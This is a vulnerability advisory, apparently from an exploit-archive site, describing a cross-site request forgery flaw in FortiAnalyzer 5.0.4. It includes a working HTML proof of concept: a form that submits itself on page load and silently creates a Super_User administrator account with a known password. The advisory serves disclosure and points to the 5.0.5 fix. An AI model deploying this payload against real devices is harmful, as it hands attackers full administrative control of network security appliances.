Fortianalyzer VM / Appliance 5.0.4 Cross Site Request Forgery

2013-11-13 / 2013-11-22
Credit: William Costa
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Cert(R) no respond my email, not Fortinet has not given the credits. I. VULNERABILITY ------------------------- CSRF vulnerabilities in OS of fortianalyzer 5.0.4 II. BACKGROUND ------------------------- Fortinets industry-leading, Network Security Platforms deliver Next Generation Firewall (NGFW) security with exceptional throughput, ultra low latency, and multi-vector threat protection. III. DESCRIPTION ------------------------- Has been detected a CSRF vulnerability in FortiAnalyzer in /cgi-bin/module//sysmanager/admin/SYSAdminUserDialog" 5.0.4 , that allows the execution attackers to hijack the authentication of administrators for requests that modify settings or creation of user administrator in fortianalyzer, because this functions are not protected by CSRF-Tokens. IV. PROOF OF CONCEPT ------------------------- The application does not validate the parameter csrf_token /cgi-bin/module//sysmanager/admin/SYSAdminUserDialog. <html> <body onload="CSRF.submit();"> <html> <body onload="CSRF.submit();"> <form id="csrf" action="https://IP_Fortianalyzer/cgi-bin/module//sysmanager/admin/SYSAdminUserDialog" method="post" name="CSRF"> <input name="userId" value="user.via.cfsr"> </input> <input name="type" value="0"> </input> <input name="rserver" value=""> </input> <input name="lserver" value=""> </input> <input name="subject" value=""> </input> <input name="cacerts" value="Fortinet_CA2"> </input> <input name="password" value="123456"> </input> <input name="password_updated" value="1"> </input> <input name="confirm_pwd" value="123456"> </input> <input name="confirm_pwd_updated" value="1"> </input> <input name="host_1" value="0.0.0.0/0.0.0.0"> </input> <input name="host_2" value="255.255.255.255/255.255.255.255"> </input> <input name="host_3" value="255.255.255.255/255.255.255.255"> </input> <input name="host_4" value="255.255.255.255/255.255.255.255"> </input> <input name="host_5" value="255.255.255.255/255.255.255.255"> </input> <input name="host_6" value="255.255.255.255/255.255.255.255"> </input> <input name="host_7" value="255.255.255.255/255.255.255.255"> </input> <input name="host_8" value="255.255.255.255/255.255.255.255"> </input> <input name="host_9" value="255.255.255.255/255.255.255.255"> </input> <input name="host_10" value="255.255.255.255/255.255.255.255"> </input> <input name="host6_1" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_2" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_3" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_4" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_5" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_6" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_7" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_8" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_9" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="host6_10" value="ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff/128"> </input> <input name="profile" value="Super_User"> </input> <input name="alladomRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_adom" value=""> </input> <input name="allpackRDGrp" value="0"> </input> <input name="_pack" value=""> </input> <input name="desc" value=""> </input> <input name="showForce" value="0"> </input> <input name="numhosts" value="0"> </input> <input name="numhosts6" value="3"> </input> <input name="_comp_8" value="OK"> </input> <input name="actionevent" value="new"> </input> <input name="profileId" value=""> </input> <input name="mgt" value=""> </input> <input name="dashboard" value=""> </input> <input name="dashboardmodal" value=""> </input> <input name="csrf_token" value=""> </input> </form> </body> </html> V. BUSINESS IMPACT ------------------------- That allows the execution attackers to hijack the authentication of administrators for requests that modify settings or creation of user administrator in fortianalyzer and have access all function of box. VI. REQUIREMENTS ----------------------- An Attacker needs to know the IP of the device. An Administrator needs an authenticated connection to the device. VII. SYSTEMS AFFECTED ------------------------- Try Fortianalyzer VM or appliance v5.0.4 VIII. SOLUTION ------------------------- UpGrade for v5.0.5 POC https://vimeo.com/78776768 By William Costa william.costa@gmail.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top